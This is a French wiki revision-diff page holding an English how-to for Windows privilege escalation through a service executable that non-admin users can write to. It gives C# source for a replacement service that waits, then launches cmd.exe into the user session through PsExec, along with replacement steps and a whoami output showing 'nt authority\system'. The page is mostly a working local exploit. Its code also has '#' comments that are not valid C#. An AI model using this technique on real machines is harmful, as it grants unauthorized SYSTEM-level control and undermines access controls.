« Privilege escalation » : différence entre les versions
De Banane Atomic
Aller à la navigationAller à la recherche
| Ligne 16 : | Ligne 16 : | ||
protected override void OnStart(string[] args) | protected override void OnStart(string[] args) | ||
{ | { | ||
Thread.Sleep( | Thread.Sleep(60000); | ||
# Windows services run in session 0 and user account runs in session 1. | |||
# use sysinternals' PsExec to run cmd.exe in session 1. | |||
Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe"); | Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe"); | ||
} | } | ||
Version du 11 février 2022 à 18:09
With a writable Windows service
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
| Program.cs |
class Program
{
static void Main(string[] args)
{
ServiceBase.Run(new ServiceBase[] { new Service() });
}
}
public class Service : ServiceBase
{
protected override void OnStart(string[] args)
{
Thread.Sleep(60000);
# Windows services run in session 0 and user account runs in session 1.
# use sysinternals' PsExec to run cmd.exe in session 1.
Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe");
}
}
|
- Replace the executable of the Windows service by the compiled application.
- A command prompt will be launched when the Windows service starts.
|
whoami REM nt authority\system |
